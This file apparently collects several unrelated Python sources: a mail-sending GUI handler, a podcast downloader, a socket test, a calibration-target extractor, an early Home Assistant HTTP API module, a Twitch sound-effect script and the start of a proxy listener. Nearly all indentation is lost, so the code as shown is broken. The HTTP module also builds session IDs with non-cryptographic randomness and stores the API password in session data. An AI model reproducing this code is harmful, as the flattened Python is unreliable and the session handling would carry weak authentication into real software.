id="email_dialog", title="Email Configuration"
)
self.email_window.content = self.mail_content_box
self.email_window.show()
def send_mail(self, widget):
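        # One handler serves all three buttons; branch on the widget id
        # ("sendmail", "sendtestmail", "cancelmail").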
if widget.id.startswith("sendm") or widget.id.startswith("sendt"):
email_index, image_path_index = None, None
if (
not len(self.mail_id_usin.value) > 3
or "@" not in str(self.mail_id_usin.value)
or "." not in str(self.mail_id_usin.value)
):
self.main_window.error_dialog("Mail Id Error", "Enter a valid mail")
return
if not len(self.mail_pn_usin.value) > 2:
self.main_window.error_dialog(
"Profile Name Error", "Profile name not typed"
)
return
if not len(self.pass_usin.value) > 5:
self.main_window.error_dialog("Password Error", "Password not typed")
return
if not len(self.sub_usin.value) > 1:
self.main_window.error_dialog("Subject Error", "Subject not typed")
return
            if not len(self.mess_usin.value) > 2:
self.main_window.error_dialog(
"Mail Content Error", "Mail content not typed"
)
return
if str(self.email_column_index.value) == "Email Column Name":
self.main_window.error_dialog(
"Email Column Name Error", "Email column not selected"
)
return
else:
email_index = self.email_headings[str(self.email_column_index.value)]
if str(self.image_column_index.value) != "Image Column Name":
image_path_index = self.email_headings[
str(self.image_column_index.value)
]
self.loading.max = len(self.email_data)
mailer = Mailer(
usr=self.mail_id_usin.value,
profile=self.mail_pn_usin.value,
psk=self.pass_usin.value,
)
time.sleep(20)
if mailer.mailer is not None:
if widget.id.startswith("sendtest"):
image_path = (
None
if image_path_index is None
else self.email_data[0][image_path_index]
)
print(
self.mail_id_usin.value,
self.sub_usin.value,
self.mess_usin.value,
image_path,
)
feedback = mailer.send_mail(
self.mail_id_usin.value,
self.sub_usin.value,
self.mess_usin.value,
image_path,
)
self.main_window.info_dialog(
"Mail Log",
f"A {feedback[0]} to {self.mail_id_usin.value} at {feedback[1]}",
)
return
elif widget.id.startswith("sendma"):
self.email_pb.max = len(self.email_data)
self.email_pb.start()
logs = []
for row in self.email_data:
feedback = mailer.send_mail(
(row[email_index]).strip(),
self.sub_usin.value,
self.mess_usin.value,
None if image_path_index is None else row[image_path_index],
)
logs.append(row + feedback)
self.email_pb.value = self.email_data.index(row) + 1
time.sleep(1)
self.email_pb.stop()
self.email_pb.value = 0
mail_log = (
self.csv_log_file_name.split(".csv")[0]
+ f"_maillogs_{time.ctime()}.csv"
)
with open(mail_log, "w") as file_object:
writer = csv.writer(file_object)
writer.writerows(logs)
self.main_window.info_dialog(
title="Mail Log",
message=f"The mail logs is available in {mail_log}",
)
mailer.mailer.quit()
else:
self.main_window.error_dialog(
"Mail Service Error",
"Please check the mailid, password & internet connection",
)
return
elif widget.id.startswith("cancelm"):
self.email_window.close()
def main():
return CertificAtor()
|
sysk.py
|
import os
import logging
import subprocess
import sys
import feedparser
import collections
import threading
from atexit import register
import time
import requests
import json
from myutils import query_config, replace_invalid_filename_char
logger = logging.getLogger('pystuff')
class Podcast:
def __init__(self,title,summary,link,publishdate,downloadresult):
self.Title = title
self.Summary = summary
self.Link = link
self.PublishDate = time.strftime("%Y-%m-%d %H:%M:%S",publishdate)
self.DownloadResult = downloadresult
def toJSON(self):
return json.dumps(self, default=lambda o: o.__dict__)
def fetchRss(rss):
feeds = []
def mightTimeout():
logger.info("feedparser from %s",rss)
source = feedparser.parse(rss)
for s in source.entries:
link = ''
for l in s.links:
if (l['type'] == 'audio/mpeg'):
link = l['href']
break
if not link:
continue
#feeds.append(Pocast(s.title, s.subtitle, link, time.strftime("%Y-%m-%d %H:%M:%S",s.published_parsed,''))
feeds.append(Podcast(s.title, s.summary, link,s.published_parsed,''))
logger.info("complete feedparser within 10s")
t = threading.Thread(target=mightTimeout)
    t.daemon = True
t.start()
logger.info("waiting....")
t.join(20)
logger.info("whatever....")
return feeds[:100]
def whatsNew(feeds, localpath):
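    # Compare the feed entries against the .mp3 files already present in localpath
    # and return only the podcasts that have not been downloaded yet.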
newpocast = []
exfile = []
    # Unpack the tuple; unused elements are replaced with _
for _, _, files in os.walk(localpath):
for name in files:
if '.' not in name:
continue
if os.path.splitext(name)[1] == '.mp3':
exfile.append(name)
break
for rs in feeds:
ex = False
for f in exfile:
if(f.find(replace_invalid_filename_char(rs.Title)) >= 0):
ex = True
break
if(ex == False):
newpocast.append(rs)
return newpocast
def downloadOnePocast(rss, localpath):
    '''Return the downloaded file path; may raise an exception.'''
result = ''
encodedName = replace_invalid_filename_char(rss.Title)
filepath = '%s/%s.mp3' % (localpath, encodedName)
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36'
}
print('downloading from: '+rss.Link)
r = requests.get(rss.Link,headers=headers, stream=True) # create HTTP response object
with open(filepath,'wb') as f:
for chunk in r.iter_content(chunk_size=4096):
if chunk:
f.write(chunk)
result = filepath
return result
def downloadOnePocastUsingAria2(rss, localpath):
    '''Return the downloaded file path; may raise an exception.'''
result = ''
encodedName = replace_invalid_filename_char(rss.Title)
filepath = '%s/%s.mp3' % (localpath, encodedName)
logger.info("user aria2 downloading: %s"%rss.Link)
ret = subprocess.call(["aria2c","-o",filepath,rss.Link])
logger.info(ret)
result = filepath
return result
'''
def updateLocalPocastList(podcasts:list, downloadpath:str):
for p in podcasts:
if p.DownloadResult:
continue
encodedName = replace_invalid_filename_char(p.Title)
filepath = '%s/%s.mp3' % (downloadpath, encodedName)
if os.path.exists(filepath):
p.DownloadResult = filepath
redis_config = query_config('redis_connection')
conn = redis.Redis(host=redis_config['host'],port=6379,password=redis_config['password'],decode_responses=True)
conn.delete('podcasts')
pipe = conn.pipeline()
for p in podcasts:
pipe.rpush('podcasts',p.toJSON())
pipe.execute()
'''
def checkAndDownloadPodcasts(url, downloadpath, maxcount=1):
print('hello, fetching new podcasts....')
if not os.path.exists(downloadpath):
os.makedirs(downloadpath)
podcasts = fetchRss(url)
#updateLocalPocastList(podcasts, downloadpath)
print("recive %s podcasts" % (len(podcasts)))
newfeeds = whatsNew(podcasts, downloadpath)
newfeedsLen = len(newfeeds)
print("found %s new podcasts" % (newfeedsLen))
downloadResult = []
while maxcount > 0:
maxcount = maxcount-1
todo = newfeeds[maxcount]
oneResult = downloadOnePocast(todo, downloadpath)
downloadResult.append((todo.Title,todo.Link,oneResult))
#updateLocalPocastList(podcasts, downloadpath)
return downloadResult
def main():
url = 'https://feeds.megaphone.fm/stuffyoushouldknow'
checkAndDownloadPodcasts(url, 'downloads/sysk')
if(__name__ == '__main__'):
main()
@register
def _atexit():
    # Run this function right before the script exits
    print('sysk script end at ' + time.ctime())
|
test_external.py
|
import os
from hks_pylib.logger.standard import StdUsers
from hks_pylib.logger import Display
import random
import threading
from hks_pynetwork.external import STCPSocket
from hks_pylib.cryptography.ciphers.symmetrics import AES_CTR, AES_CBC
from hks_pylib.logger import StandardLoggerGenerator
logger_generator = StandardLoggerGenerator("tests/test_external.log")
KEY = os.urandom(32)
N_SAMPLE_DATA = random.randint(10, 20)
CLIENT_SAMPLE_DATA_LIST = [os.urandom(random.randint(100, 200)) for _ in range(N_SAMPLE_DATA)]
SERVER_SAMPLE_DATA_LIST = [os.urandom(random.randint(100, 200)) for _ in range(N_SAMPLE_DATA)]
def server():
server = STCPSocket(
cipher=AES_CTR(KEY),
name="Server",
buffer_size=1024,
logger_generator=logger_generator,
display={StdUsers.USER: Display.ALL, StdUsers.DEV: Display.ALL}
)
server.bind(("127.0.0.1", 9999))
server.listen()
socket, addr = server.accept()
err = None
for client_data, server_data in zip(CLIENT_SAMPLE_DATA_LIST, SERVER_SAMPLE_DATA_LIST):
data = socket.recv()
if data != client_data:
err = "SERVER ERROR DATA NOT MATCH"
break
socket.send(server_data)
socket.close()
if err:
raise Exception(err)
socket.close()
def client():
client = STCPSocket(
cipher=AES_CTR(KEY),
name="Client",
buffer_size=1024,
logger_generator=logger_generator,
display={StdUsers.USER: Display.ALL, StdUsers.DEV: Display.ALL}
)
client.connect(("127.0.0.1", 9999))
err = None
for client_data, server_data in zip(CLIENT_SAMPLE_DATA_LIST, SERVER_SAMPLE_DATA_LIST):
client.send(client_data)
data = client.recv()
if data != server_data:
err = "ERROR CLIENT DATA NOT MATCH"
break
client.close()
if err:
raise Exception(err)
def test_client_server():
t1 = threading.Thread(target=server)
t1.start()
t2 = threading.Thread(target=client)
t2.start()
t1.join()
t2.join()
if __name__ == "__main__":
client()
|
TargetExtractor.py
|
import sm
import numpy as np
import sys
import multiprocessing
try:
import queue
except ImportError:
import Queue as queue # python 2.x
import time
import copy
import cv2
def multicoreExtractionWrapper(detector, taskq, resultq, clearImages, noTransformation):
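    # Worker process: pull (idx, stamp, image) tasks until the queue is empty and push
    # each successful detection back together with its index so results can be re-ordered.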
while 1:
try:
task = taskq.get_nowait()
except queue.Empty:
return
idx = task[0]
stamp = task[1]
image = task[2]
if noTransformation:
success, obs = detector.findTargetNoTransformation(stamp, np.array(image))
else:
success, obs = detector.findTarget(stamp, np.array(image))
if clearImages:
obs.clearImage()
if success:
resultq.put( (obs, idx) )
def extractCornersFromDataset(dataset, detector, multithreading=False, numProcesses=None, clearImages=True, noTransformation=False):
print("Extracting calibration target corners")
targetObservations = []
numImages = dataset.numImages()
    # prepare progress bar
iProgress = sm.Progress2(numImages)
iProgress.sample()
if multithreading:
if not numProcesses:
numProcesses = max(1,multiprocessing.cpu_count()-1)
try:
manager = multiprocessing.Manager()
resultq = manager.Queue()
manager2 = multiprocessing.Manager()
taskq = manager2.Queue()
for idx, (timestamp, image) in enumerate(dataset.readDataset()):
taskq.put( (idx, timestamp, image) )
plist=list()
for pidx in range(0, numProcesses):
detector_copy = copy.copy(detector)
p = multiprocessing.Process(target=multicoreExtractionWrapper, args=(detector_copy, taskq, resultq, clearImages, noTransformation, ))
p.start()
plist.append(p)
#wait for results
last_done=0
while 1:
if all([not p.is_alive() for p in plist]):
time.sleep(0.1)
break
done = numImages-taskq.qsize()
sys.stdout.flush()
if (done-last_done) > 0:
iProgress.sample(done-last_done)
last_done = done
time.sleep(0.5)
resultq.put('STOP')
except Exception as e:
raise RuntimeError("Exception during multithreaded extraction: {0}".format(e))
#get result sorted by time (=idx)
if resultq.qsize() > 1:
targetObservations = [[]]*(resultq.qsize()-1)
for lidx, data in enumerate(iter(resultq.get, 'STOP')):
obs=data[0]; time_idx = data[1]
targetObservations[lidx] = (time_idx, obs)
targetObservations = list(zip(*sorted(targetObservations, key=lambda tup: tup[0])))[1]
else:
targetObservations=[]
#single threaded implementation
else:
for timestamp, image in dataset.readDataset():
if noTransformation:
success, observation = detector.findTargetNoTransformation(timestamp, np.array(image))
else:
success, observation = detector.findTarget(timestamp, np.array(image))
if clearImages:
observation.clearImage()
if success == 1:
targetObservations.append(observation)
iProgress.sample()
if len(targetObservations) == 0:
print("\r")
sm.logFatal("No corners could be extracted for camera {0}! Check the calibration target configuration and dataset.".format(dataset.topic))
else:
print("\r Extracted corners for %d images (of %d images) " % (len(targetObservations), numImages))
#close all opencv windows that might be open
cv2.destroyAllWindows()
return targetObservations
|
http.py
|
"""
homeassistant.components.httpinterface
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module provides an API and a HTTP interface for debug purposes.
By default it will run on port 8123.
All API calls have to be accompanied by an 'api_password' parameter and will
return JSON. If successful calls will return status code 200 or 201.
Other status codes that can occur are:
- 400 (Bad Request)
- 401 (Unauthorized)
- 404 (Not Found)
- 405 (Method not allowed)
The api supports the following actions:
/api - GET
Returns message if API is up and running.
Example result:
{
"message": "API running."
}
/api/states - GET
Returns a list of entities for which a state is available
Example result:
[
{ .. state object .. },
{ .. state object .. }
]
/api/states/<entity_id> - GET
Returns the current state from an entity
Example result:
{
"attributes": {
"next_rising": "07:04:15 29-10-2013",
"next_setting": "18:00:31 29-10-2013"
},
"entity_id": "weather.sun",
"last_changed": "23:24:33 28-10-2013",
"state": "below_horizon"
}
/api/states/<entity_id> - POST
Updates the current state of an entity. Returns status code 201 if successful
with location header of updated resource and as body the new state.
parameter: new_state - string
optional parameter: attributes - JSON encoded object
Example result:
{
"attributes": {
"next_rising": "07:04:15 29-10-2013",
"next_setting": "18:00:31 29-10-2013"
},
"entity_id": "weather.sun",
"last_changed": "23:24:33 28-10-2013",
"state": "below_horizon"
}
/api/events/<event_type> - POST
Fires an event with event_type
optional parameter: event_data - JSON encoded object
Example result:
{
"message": "Event download_file fired."
}
"""
import json
import threading
import logging
import time
import gzip
import os
import random
import string
from datetime import timedelta
from homeassistant.util import Throttle
from http.server import SimpleHTTPRequestHandler, HTTPServer
from http import cookies
from socketserver import ThreadingMixIn
from urllib.parse import urlparse, parse_qs
import homeassistant as ha
from homeassistant.const import (
SERVER_PORT, CONTENT_TYPE_JSON,
HTTP_HEADER_HA_AUTH, HTTP_HEADER_CONTENT_TYPE, HTTP_HEADER_ACCEPT_ENCODING,
HTTP_HEADER_CONTENT_ENCODING, HTTP_HEADER_VARY, HTTP_HEADER_CONTENT_LENGTH,
HTTP_HEADER_CACHE_CONTROL, HTTP_HEADER_EXPIRES, HTTP_OK, HTTP_UNAUTHORIZED,
HTTP_NOT_FOUND, HTTP_METHOD_NOT_ALLOWED, HTTP_UNPROCESSABLE_ENTITY)
import homeassistant.remote as rem
import homeassistant.util as util
import homeassistant.util.dt as date_util
import homeassistant.bootstrap as bootstrap
DOMAIN = "http"
DEPENDENCIES = []
CONF_API_PASSWORD = "api_password"
CONF_SERVER_HOST = "server_host"
CONF_SERVER_PORT = "server_port"
CONF_DEVELOPMENT = "development"
CONF_SESSIONS_ENABLED = "sessions_enabled"
DATA_API_PASSWORD = 'api_password'
# Throttling time in seconds for expired sessions check
MIN_SEC_SESSION_CLEARING = timedelta(seconds=20)
SESSION_TIMEOUT_SECONDS = 1800
SESSION_KEY = 'sessionId'
_LOGGER = logging.getLogger(__name__)
def setup(hass, config=None):
""" Sets up the HTTP API and debug interface. """
if config is None or DOMAIN not in config:
config = {DOMAIN: {}}
api_password = util.convert(config[DOMAIN].get(CONF_API_PASSWORD), str)
no_password_set = api_password is None
if no_password_set:
api_password = util.get_random_string()
# If no server host is given, accept all incoming requests
server_host = config[DOMAIN].get(CONF_SERVER_HOST, '0.0.0.0')
server_port = config[DOMAIN].get(CONF_SERVER_PORT, SERVER_PORT)
development = str(config[DOMAIN].get(CONF_DEVELOPMENT, "")) == "1"
sessions_enabled = config[DOMAIN].get(CONF_SESSIONS_ENABLED, True)
server = HomeAssistantHTTPServer(
(server_host, server_port), RequestHandler, hass, api_password,
development, no_password_set, sessions_enabled)
hass.bus.listen_once(
ha.EVENT_HOMEASSISTANT_START,
lambda event:
threading.Thread(target=server.start, daemon=True).start())
hass.http = server
hass.config.api = rem.API(util.get_local_ip(), api_password, server_port)
return True
# pylint: disable=too-many-instance-attributes
class HomeAssistantHTTPServer(ThreadingMixIn, HTTPServer):
""" Handle HTTP requests in a threaded fashion. """
# pylint: disable=too-few-public-methods
allow_reuse_address = True
daemon_threads = True
# pylint: disable=too-many-arguments
def __init__(self, server_address, request_handler_class,
hass, api_password, development, no_password_set,
sessions_enabled):
super().__init__(server_address, request_handler_class)
self.server_address = server_address
self.hass = hass
self.api_password = api_password
self.development = development
self.no_password_set = no_password_set
self.paths = []
self.sessions = SessionStore(sessions_enabled)
# We will lazy init this one if needed
self.event_forwarder = None
if development:
_LOGGER.info("running http in development mode")
def start(self):
""" Starts the server. """
self.hass.bus.listen_once(
ha.EVENT_HOMEASSISTANT_STOP,
lambda event: self.shutdown())
_LOGGER.info(
"Starting web interface at http://%s:%d", *self.server_address)
# 31-1-2015: Refactored frontend/api components out of this component
# To prevent stuff from breaking, load the two extracted components
bootstrap.setup_component(self.hass, 'api')
bootstrap.setup_component(self.hass, 'frontend')
self.serve_forever()
def register_path(self, method, url, callback, require_auth=True):
""" Regitsters a path wit the server. """
self.paths.append((method, url, callback, require_auth))
# pylint: disable=too-many-public-methods,too-many-locals
class RequestHandler(SimpleHTTPRequestHandler):
"""
Handles incoming HTTP requests
We extend from SimpleHTTPRequestHandler instead of Base so we
can use the guess content type methods.
"""
server_version = "HomeAssistant/1.0"
def __init__(self, req, client_addr, server):
""" Contructor, call the base constructor and set up session """
self._session = None
SimpleHTTPRequestHandler.__init__(self, req, client_addr, server)
def _handle_request(self, method): # pylint: disable=too-many-branches
""" Does some common checks and calls appropriate method. """
url = urlparse(self.path)
# Read query input
data = parse_qs(url.query)
# parse_qs gives a list for each value, take the latest element
for key in data:
data[key] = data[key][-1]
# Did we get post input ?
content_length = int(self.headers.get(HTTP_HEADER_CONTENT_LENGTH, 0))
if content_length:
body_content = self.rfile.read(content_length).decode("UTF-8")
try:
data.update(json.loads(body_content))
except (TypeError, ValueError):
# TypeError if JSON object is not a dict
# ValueError if we could not parse JSON
_LOGGER.exception(
"Exception parsing JSON: %s", body_content)
self.write_json_message(
"Error parsing JSON", HTTP_UNPROCESSABLE_ENTITY)
return
self._session = self.get_session()
if self.server.no_password_set:
api_password = self.server.api_password
else:
api_password = self.headers.get(HTTP_HEADER_HA_AUTH)
if not api_password and DATA_API_PASSWORD in data:
api_password = data[DATA_API_PASSWORD]
if not api_password and self._session is not None:
api_password = self._session.cookie_values.get(
CONF_API_PASSWORD)
if '_METHOD' in data:
method = data.pop('_METHOD')
# Var to keep track if we found a path that matched a handler but
# the method was different
path_matched_but_not_method = False
# Var to hold the handler for this path and method if found
handle_request_method = False
require_auth = True
# Check every handler to find matching result
for t_method, t_path, t_handler, t_auth in self.server.paths:
# we either do string-comparison or regular expression matching
# pylint: disable=maybe-no-member
if isinstance(t_path, str):
path_match = url.path == t_path
else:
path_match = t_path.match(url.path)
if path_match and method == t_method:
# Call the method
handle_request_method = t_handler
require_auth = t_auth
break
elif path_match:
path_matched_but_not_method = True
# Did we find a handler for the incoming request?
if handle_request_method:
# For some calls we need a valid password
if require_auth and api_password != self.server.api_password:
self.write_json_message(
"API password missing or incorrect.", HTTP_UNAUTHORIZED)
else:
if self._session is None and require_auth:
self._session = self.server.sessions.create(
api_password)
handle_request_method(self, path_match, data)
elif path_matched_but_not_method:
self.send_response(HTTP_METHOD_NOT_ALLOWED)
self.end_headers()
else:
self.send_response(HTTP_NOT_FOUND)
self.end_headers()
def do_HEAD(self): # pylint: disable=invalid-name
""" HEAD request handler. """
self._handle_request('HEAD')
def do_GET(self): # pylint: disable=invalid-name
""" GET request handler. """
self._handle_request('GET')
def do_POST(self): # pylint: disable=invalid-name
""" POST request handler. """
self._handle_request('POST')
def do_PUT(self): # pylint: disable=invalid-name
""" PUT request handler. """
self._handle_request('PUT')
def do_DELETE(self): # pylint: disable=invalid-name
""" DELETE request handler. """
self._handle_request('DELETE')
def write_json_message(self, message, status_code=HTTP_OK):
""" Helper method to return a message to the caller. """
self.write_json({'message': message}, status_code=status_code)
def write_json(self, data=None, status_code=HTTP_OK, location=None):
""" Helper method to return JSON to the caller. """
self.send_response(status_code)
self.send_header(HTTP_HEADER_CONTENT_TYPE, CONTENT_TYPE_JSON)
if location:
self.send_header('Location', location)
self.set_session_cookie_header()
self.end_headers()
if data is not None:
self.wfile.write(
json.dumps(data, indent=4, sort_keys=True,
cls=rem.JSONEncoder).encode("UTF-8"))
def write_file(self, path):
""" Returns a file to the user. """
try:
with open(path, 'rb') as inp:
self.write_file_pointer(self.guess_type(path), inp)
except IOError:
self.send_response(HTTP_NOT_FOUND)
self.end_headers()
_LOGGER.exception("Unable to serve %s", path)
def write_file_pointer(self, content_type, inp):
"""
Helper function to write a file pointer to the user.
Does not do error handling.
"""
do_gzip = 'gzip' in self.headers.get(HTTP_HEADER_ACCEPT_ENCODING, '')
self.send_response(HTTP_OK)
self.send_header(HTTP_HEADER_CONTENT_TYPE, content_type)
self.set_cache_header()
self.set_session_cookie_header()
if do_gzip:
gzip_data = gzip.compress(inp.read())
self.send_header(HTTP_HEADER_CONTENT_ENCODING, "gzip")
self.send_header(HTTP_HEADER_VARY, HTTP_HEADER_ACCEPT_ENCODING)
self.send_header(HTTP_HEADER_CONTENT_LENGTH, str(len(gzip_data)))
else:
fst = os.fstat(inp.fileno())
self.send_header(HTTP_HEADER_CONTENT_LENGTH, str(fst[6]))
self.end_headers()
if self.command == 'HEAD':
return
elif do_gzip:
self.wfile.write(gzip_data)
else:
self.copyfile(inp, self.wfile)
def set_cache_header(self):
""" Add cache headers if not in development """
if not self.server.development:
# 1 year in seconds
cache_time = 365 * 86400
self.send_header(
HTTP_HEADER_CACHE_CONTROL,
"public, max-age={}".format(cache_time))
self.send_header(
HTTP_HEADER_EXPIRES,
self.date_time_string(time.time()+cache_time))
def set_session_cookie_header(self):
""" Add the header for the session cookie """
if self.server.sessions.enabled and self._session is not None:
existing_sess_id = self.get_current_session_id()
if existing_sess_id != self._session.session_id:
self.send_header(
'Set-Cookie',
SESSION_KEY+'='+self._session.session_id)
def get_session(self):
""" Get the requested session object from cookie value """
if self.server.sessions.enabled is not True:
return None
session_id = self.get_current_session_id()
if session_id is not None:
session = self.server.sessions.get(session_id)
if session is not None:
session.reset_expiry()
return session
return None
def get_current_session_id(self):
"""
Extracts the current session id from the
cookie or returns None if not set
"""
cookie = cookies.SimpleCookie()
if self.headers.get('Cookie', None) is not None:
cookie.load(self.headers.get("Cookie"))
if cookie.get(SESSION_KEY, False):
return cookie[SESSION_KEY].value
return None
class ServerSession:
""" A very simple session class """
def __init__(self, session_id):
""" Set up the expiry time on creation """
self._expiry = 0
self.reset_expiry()
self.cookie_values = {}
self.session_id = session_id
def reset_expiry(self):
""" Resets the expiry based on current time """
self._expiry = date_util.utcnow() + timedelta(
seconds=SESSION_TIMEOUT_SECONDS)
@property
def is_expired(self):
""" Return true if the session is expired based on the expiry time """
return self._expiry < date_util.utcnow()
class SessionStore:
""" Responsible for storing and retrieving http sessions """
def __init__(self, enabled=True):
""" Set up the session store """
self._sessions = {}
self.enabled = enabled
self.session_lock = threading.RLock()
@Throttle(MIN_SEC_SESSION_CLEARING)
def remove_expired(self):
""" Remove any expired sessions. """
if self.session_lock.acquire(False):
try:
keys = []
for key in self._sessions.keys():
keys.append(key)
for key in keys:
if self._sessions[key].is_expired:
del self._sessions[key]
_LOGGER.info("Cleared expired session %s", key)
finally:
self.session_lock.release()
def add(self, key, session):
""" Add a new session to the list of tracked sessions """
self.remove_expired()
with self.session_lock:
self._sessions[key] = session
def get(self, key):
""" get a session by key """
self.remove_expired()
session = self._sessions.get(key, None)
if session is not None and session.is_expired:
return None
return session
def create(self, api_password):
""" Creates a new session and adds it to the sessions """
if self.enabled is not True:
return None
chars = string.ascii_letters + string.digits
session_id = ''.join([random.choice(chars) for i in range(20)])
session = ServerSession(session_id)
session.cookie_values[CONF_API_PASSWORD] = api_password
self.add(session_id, session)
return session
|
ChannelPointsSFXTrigger_StreamlabsSystem.py
|
# -*- coding: utf-8 -*-
#---------------------------
# Import Libraries
#---------------------------
import clr, codecs, json, os, re, sys, threading, datetime
clr.AddReference("IronPython.Modules.dll")
clr.AddReferenceToFileAndPath(os.path.join(os.path.dirname(os.path.realpath(__file__)) + "\References", "TwitchLib.PubSub.dll"))
from TwitchLib.PubSub import TwitchPubSub
#---------------------------
# [Required] Script Information
#---------------------------
ScriptName = "Twitch Channel Points SFX Trigger"
Website = "https://www.twitch.tv/EncryptedThoughts"
Description = "Script to trigger SFX on channel point reward redemptions."
Creator = "EncryptedThoughts"
Version = "1.0.0.0"
#---------------------------
# Define Global Variables
#---------------------------
SettingsFile = os.path.join(os.path.dirname(__file__), "settings.json")
ReadMe = os.path.join(os.path.dirname(__file__), "README.txt")
EventReceiver = None
ThreadQueue = []
CurrentThread = None
PlayNextAt = datetime.datetime.now()
#---------------------------------------
# Classes
#---------------------------------------
class Settings(object):
def __init__(self, SettingsFile=None):
if SettingsFile and os.path.isfile(SettingsFile):
with codecs.open(SettingsFile, encoding="utf-8-sig", mode="r") as f:
self.__dict__ = json.load(f, encoding="utf-8")
else:
self.EnableDebug = False
self.Username = ""
self.TwitchReward1Name = ""
self.SFX1Path = ""
self.SFX1Volume = 100
self.SFX1Delay = 10
self.TwitchReward2Name = ""
self.SFX2Path = ""
self.SFX2Volume = 100
self.SFX2Delay = 10
self.TwitchReward3Name = ""
self.SFX3Path = ""
self.SFX3Volume = 100
self.SFX3Delay = 10
self.TwitchReward4Name = ""
self.SFX4Path = ""
self.SFX4Volume = 100
self.SFX4Delay = 10
self.TwitchReward5Name = ""
self.SFX5Path = ""
self.SFX5Volume = 100
self.SFX5Delay = 10
def Reload(self, jsondata):
self.__dict__ = json.loads(jsondata, encoding="utf-8")
return
def Save(self, SettingsFile):
try:
with codecs.open(SettingsFile, encoding="utf-8-sig", mode="w+") as f:
json.dump(self.__dict__, f, encoding="utf-8")
with codecs.open(SettingsFile.replace("json", "js"), encoding="utf-8-sig", mode="w+") as f:
f.write("var settings = {0};".format(json.dumps(self.__dict__, encoding='utf-8')))
except:
Parent.Log(ScriptName, "Failed to save settings to file.")
return
#---------------------------
# [Required] Initialize Data (Only called on load)
#---------------------------
def Init():
global ScriptSettings
ScriptSettings = Settings(SettingsFile)
ScriptSettings.Save(SettingsFile)
## Init the Streamlabs Event Receiver
Start()
return
def Start():
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Starting receiver");
global EventReceiver
EventReceiver = TwitchPubSub()
EventReceiver.OnPubSubServiceConnected += EventReceiverConnected
EventReceiver.OnListenResponse += EventReceiverListenResponse
EventReceiver.OnRewardRedeemed += EventReceiverRewardRedeemed
EventReceiver.Connect()
def EventReceiverConnected(sender, e):
#get channel id for username
headers = { 'Client-ID': 'icyqwwpy744ugu5x4ymyt6jqrnpxso' }
result = json.loads(Parent.GetRequest("https://api.twitch.tv/helix/users?login=" + ScriptSettings.Username,headers))
user = json.loads(result["response"])
id = user["data"][0]["id"]
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Event receiver connected, sending topics for channel id: " + id);
EventReceiver.ListenToRewards(id)
EventReceiver.SendTopics()
return
def EventReceiverListenResponse(sender, e):
if ScriptSettings.EnableDebug:
if e.Successful:
Parent.Log(ScriptName, "Successfully verified listening to topic: " + e.Topic);
else:
Parent.Log(ScriptName, "Failed to listen! Error: " + e.Response.Error);
return
def EventReceiverRewardRedeemed(sender, e):
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Event triggered")
if e.RewardTitle == ScriptSettings.TwitchReward1Name:
ThreadQueue.append(threading.Thread(target=RewardRedeemedWorker,args=(ScriptSettings.SFX1Path, ScriptSettings.SFX1Volume, ScriptSettings.SFX1Delay,)))
if e.RewardTitle == ScriptSettings.TwitchReward2Name:
ThreadQueue.append(threading.Thread(target=RewardRedeemedWorker,args=(ScriptSettings.SFX2Path, ScriptSettings.SFX2Volume, ScriptSettings.SFX2Delay,)))
if e.RewardTitle == ScriptSettings.TwitchReward3Name:
ThreadQueue.append(threading.Thread(target=RewardRedeemedWorker,args=(ScriptSettings.SFX3Path, ScriptSettings.SFX3Volume, ScriptSettings.SFX3Delay,)))
if e.RewardTitle == ScriptSettings.TwitchReward4Name:
ThreadQueue.append(threading.Thread(target=RewardRedeemedWorker,args=(ScriptSettings.SFX4Path, ScriptSettings.SFX4Volume, ScriptSettings.SFX4Delay,)))
if e.RewardTitle == ScriptSettings.TwitchReward5Name:
ThreadQueue.append(threading.Thread(target=RewardRedeemedWorker,args=(ScriptSettings.SFX5Path, ScriptSettings.SFX5Volume, ScriptSettings.SFX5Delay,)))
return
def RewardRedeemedWorker(path, volume, delay):
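    # Play the configured sound, then push PlayNextAt forward so Tick() waits `delay`
    # seconds before starting the next queued SFX thread.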
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, path + " " + str(volume) + " " + str(delay))
Parent.PlaySound(path, volume/100)
global PlayNextAt
PlayNextAt = datetime.datetime.now() + datetime.timedelta(0, delay)
#---------------------------
# [Required] Execute Data / Process messages
#---------------------------
def Execute(data):
return
#---------------------------
# [Required] Tick method (Gets called during every iteration even when there is no incoming data)
#---------------------------
def Tick():
global PlayNextAt
if PlayNextAt > datetime.datetime.now():
return
global CurrentThread
if CurrentThread and CurrentThread.isAlive() == False:
CurrentThread = None
if CurrentThread == None and len(ThreadQueue) > 0:
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Starting new thread. " + str(PlayNextAt))
CurrentThread = ThreadQueue.pop(0)
CurrentThread.start()
return
#---------------------------
# [Optional] Parse method (Allows you to create your own custom $parameters)
#---------------------------
def Parse(parseString, userid, username, targetid, targetname, message):
return parseString
#---------------------------
# [Optional] Reload Settings (Called when a user clicks the Save Settings button in the Chatbot UI)
#---------------------------
def ReloadSettings(jsonData):
# Execute json reloading here
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Saving settings.")
global EventReceiver
try:
if EventReceiver:
EventReceiver.Disconnect()
ScriptSettings.__dict__ = json.loads(jsonData)
ScriptSettings.Save(SettingsFile)
EventReceiver = None
Start()
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Settings saved successfully")
except Exception as e:
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, str(e))
return
#---------------------------
# [Optional] Unload (Called when a user reloads their scripts or closes the bot / cleanup stuff)
#---------------------------
def Unload():
# Disconnect EventReceiver cleanly
try:
if EventReceiver:
EventReceiver.Disconnect()
except:
if ScriptSettings.EnableDebug:
Parent.Log(ScriptName, "Event receiver already disconnected")
return
#---------------------------
# [Optional] ScriptToggled (Notifies you when a user disables your script or enables it)
#---------------------------
def ScriptToggled(state):
return
def openreadme():
os.startfile(ReadMe)
|
ProxyListener.py
|
import socket
import socketserver
import threading
import sys
import glob
import time
import importlib
import queue
import select
import logging
import ssl
from OpenSSL import SSL
from .ssl_utils import ssl_detector
from . import *
import os
BUF_SZ = 1024
class ProxyListener(object):
def __init__(
self,
config={},
